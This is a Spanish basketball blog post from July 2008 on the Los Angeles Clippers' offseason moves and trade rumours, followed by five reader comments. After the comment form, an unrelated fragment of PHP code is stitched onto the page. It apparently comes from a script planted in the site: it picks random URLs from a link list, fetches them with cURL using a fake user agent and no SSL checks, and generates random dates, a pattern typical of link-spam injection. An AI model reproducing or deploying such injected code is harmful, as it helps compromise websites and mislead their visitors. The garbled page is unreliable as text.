Los Clippers han de moverse

12 de July de 2008 por txusma

Seguramente los Clippers prometieron a Baron Davis un equipo competitivo capaz de aspirar a dar guerra en el Oeste y pelear por clasificarse para los Playoffs. En este fabuloso plan aparecían Elton Brand y Corey Maggette. El primero ha fichado por los Philadelphia 76ers y el segundo ha hecho lo propio por los Golden State Warriors que se han vengado a su manera de la franquicia angelina. Ahora el equipo competitivo ha desaparecido y tan solo Baron Davis, Chris Kaman y lo que pueda hacer el rookie Eric Gordon supone una pequeña ilusión para sus aficionados. Es por eso que la directiva continúa moviéndose, dispone de dinero y quiere gastarlo para ofrecer lo prometido a “Too Easy”.

De momento los New York Knicks han rechazado una propuesta de traspaso en que el “hermano pobre” recibiría a Zach Randolph a cambio , entre otras cosas, de Eric Gordon. Otro nombre que aparece y que también vendría a cubrir la baja de Brand es el del ala-pivot de los Bobcats, Emeka Okafor al que podrían ofrecer 10 millones de dólares por temporada. No es una opción descabellada y más cuando parece que los Bobcats se estarían moviendo para buscarle sustituo. En este sentido suena un Carlos Boozer x Sean May y Gerald Wallace.

Además de estos rumores, se ha confirmado que los Clippers han decidido renunciar a los derechos de varios jugadores entre ellos el base Shaun Livingstone. Livingstone, lesionado casi toda la temporada debido a una terrorífica lesión de rodilla se enfrentará al reto de volver a sentirse jugador de baloncesto, pero no lo hará al lado de los que han sido sus compañeros desde que llegó a la NBA.

Más noticias y rumores:

  • Los Celtics han firmado al ex-Warrior Patrick O’Bryant. El pivot, elegido con el número 9 en el draft de 2006, llegó muy verde a la liga y nuncó llegó a adaptarse al estilo de Don Nelson. Ahora los Celtics esperen que su mayor madurez le haga mejorar y dar un paso al frente.
  • El interés de los Knicks en Monta Ellis sigue en pie y parece que es recíproco.
  • Los New Jersey Nets se han hecho con Eduardo Najera y Jarvis Hayes. Marcus Williams, Josh Boone, Sean Williams e incluso Nenad Krstic podrían salir del equipo en los próximos días.
  • Orlando también se ha hecho con un ex-warrior, en este caso Mickael Pietrus.
Comenta

5 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues si fuera los Knicks y pudiera quitarme este pedazo contrato de encima lo haria… para NY seria estar por debajo del limite al final del año que viene y eso les daría mucha libertad de movimientos.

      Citar

  2. Dantley dice:
    #2

    Si se pudiera hacer Zach Randolph x nada sería positivo para los Knicks. Si además se traen algo, no entiendo que no lo hagan. Zach además no encaja nada en el sistema D’Antoni

      Citar

  3. xapa_croack dice:
    #3

    El trade era este

    Thomas + Cuttino x Randolph+ Wilson Chandler + Nate Robinson.

    Si en lugar de meter a Zach, hubiera metido a lee, seria fenomenal, pero el contrato de Zach es muy pesado.

      Citar

  4. xapa_croack dice:
    #4

    Sobre livingstone pues han renunciado a sus derechos para renovarlo a la baja, pero claro esto quiere decir que se pueden meter mas equipos a pujar.

      Citar

  5. Viva_Dirk dice:
    #5

    Se os ha olvidado mencionar a una de las esperanzas de los Clippers: Al Thornton. El juego exterior esta bastante bien cubierto a poco que Gordon resulte, con Davis, Gordon, Thornton, Cuttino y Thomas tienen bien cubiertas las 3 posiciones exteriores a falta de un base suplente(aunque Gordon pueda jugar minutos de base).

    Traerse a Okafor por 10 millones al año sería una grandísima operación ya que les deja aun dinero para otro refuerzo.

    Una vez dicho todo esto, mientras el propietario no quiera soltar la pasta hay poco que hacer, tenian el equipo hecho reteniendo a Brand y Maggette.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>